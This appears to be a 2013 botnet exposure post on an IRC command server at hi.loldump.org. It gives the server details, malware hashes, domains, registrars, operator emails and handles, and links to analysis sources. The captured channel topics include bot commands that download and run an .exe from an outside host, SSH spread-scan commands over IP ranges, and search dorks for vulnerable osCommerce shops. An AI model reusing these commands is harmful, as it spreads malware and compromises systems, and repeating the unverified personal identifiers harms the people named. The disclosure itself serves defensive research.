Resolved : [hi.loldump.org] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {iNF-00-DEU-XP-DELL-9523}
Channel: #scanner# (Password: )
Channeltopic: :.join #scanner2
hosting infos:
http://whois.domaintools.com/176.31.123.56
ctrlaltdestroy_ - November 4, 2013 at 9:48 pm
Known Years in operation 2011-2013+
Few Hashes:
D9A2A2A31E09B89BEE93C7E6A408D93E
0D77BFA58D58CEB81766D033C9D13AB0
1CB00FB1821A1B288BB28D738E71DA3E
71F4D7D3D6D6D56F8100956FD5AE48EA
E1FC5B55AFAD4DD490D39DA089C72AB3
Primary host: OVH
Primary IP: 37.59.53.162
Few domains used:
heytherebitch.com
Xxxd2.com
jorgee.nu
keshmoney.biz
smellypussy.info
loldump.org
haztuwebsite.com
webingenial.com
quiboxs.com
sunelectronix.com
lostradio.net
leetpm.info
e-qacs.com
r0x.info
sexyi.am
ngulesh.info
drshells.net
takohu.net
qiju.info
qijupra.info
Registrars:
eNOM Inc / reseller:namecheap
GoDaddy
TUCOWS DOMAINS INC. / Papaki Ltd, info@papaki.gr
abcdomain
WEBNAMES.RU / regtime
CLOUD GROUP LIMITED / hostingservicesinc.net
PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM / domains4bitcoins.com
Modded IRC
Checks version on connect > if version response is not permitted > ip block
Parting channels = rejoin to bypass join #0,0 or disconnect/reconnect
#exploit#
TCL: !osco[w] "eshop/"+"catalogue/"+"osCsid="
TCL: !osco[w] "osc/"+"&osCsid="
TCL: !osco[w] "osc/"+"?osCsid="
TCL: !osco[w] "osc/"+"catalog/" "&osCsid="
TCL: !osco[w] "osc/"+"cataloge/" "&osCsid="
TCL: !osco[w] "powered by oscommerce" +/tienda/
#main
! Topic is '!dl http://interzoo.co.kr/bbs/zeknal2.exe -n'
! Set by x00 on Mon Nov 04
#scannerx
! Topic is '.ban |.scan sshspreadscan 5 5 0 41.x.x.x |.scan sshspreadscan 5 10 0 201.x.x.x |.scan sshspreadscan 5 10 0 200.x.x.x |.scan sshspreadscan 5 10 0 77.x.x.x |.scan sshspreadscan 5 10 0 80.x.x.x |.join #scannerx2'
! Set by x00 on Mon Nov 04
#r#
! Topic is '.xpl 50 1 186 -b 3'
! Set by x00 on Mon Nov 04
#boss
! Topic is '!dl http://interzoo.co.kr/bbs/zeknal2.exe -n'
! Set by x00 on Mon Nov 04 08:48:22
St0n3d: St0n3d@127.0.0.1
x00: x00@127.0.0.1
TCL: TCL@127.0.0.1
M: MaikiHax@lolhome
Jorgee: Jorgee@127.0.0.1
Some Social Data:
Drenushi@msn.com
bram226@gmail.com -> Lolita on Hackforums
->
lr:
u4056708 (Run Xbl)
emails:
nade@hackingnation.org
brandon6374@aim.com
admin@teamnix.org
DarkWereWolf69@hotmail.com
aims:
bpbauburn1995
aa0nade
cfbluntman
cameronisfud
Sources and additional information:
http://pastebin.com/LYMA0Keq
http://anubis.iseclab.org/?action=result&task_id=1cd4833c7e8e68fc4c596c86872315503&format=html
http://eureka.cyber-ta.org/OUTPUT/41711c6a0eb71e094d0c88f3af96a7fa/
http://www.bitdefender.com/VIRUS-1000651-en–Backdoor-IRCBot-Dorkbot-A.html
http://ownedsecurity.blogspot.com/2011/06/smellypussyinfongrbot-very-large-irc.html
http://www.exposedbotnets.com/2011/11/mlsksfkajsfsacomngrbot-hosted-in.html
http://www.exposedbotnets.com/2012/03/supportleetpminfongrbot-from-burimi-big.html
http://www.exposedbotnets.com/2012/05/xxxd2comngrbot-hosted-in-united-states.html
http://www.threatexpert.com/report.aspx?md5=295da240a27bbdf63dbaffe30110dea7
http://www.exposedbotnets.com/2012/09/m74zaptoorg-rage-hosted-by-germany.html
http://www.exposedbotnets.com/2013/05/hiloldumporgirc-botnet-hosted-in-france.html
http://www.exposedbotnets.com/2013/05/irce-qacscomirc-botnet-hosted-in.html
http://www.exposedbotnets.com/2013/05/werehackedjpirc-botnet-hosted-in-france.html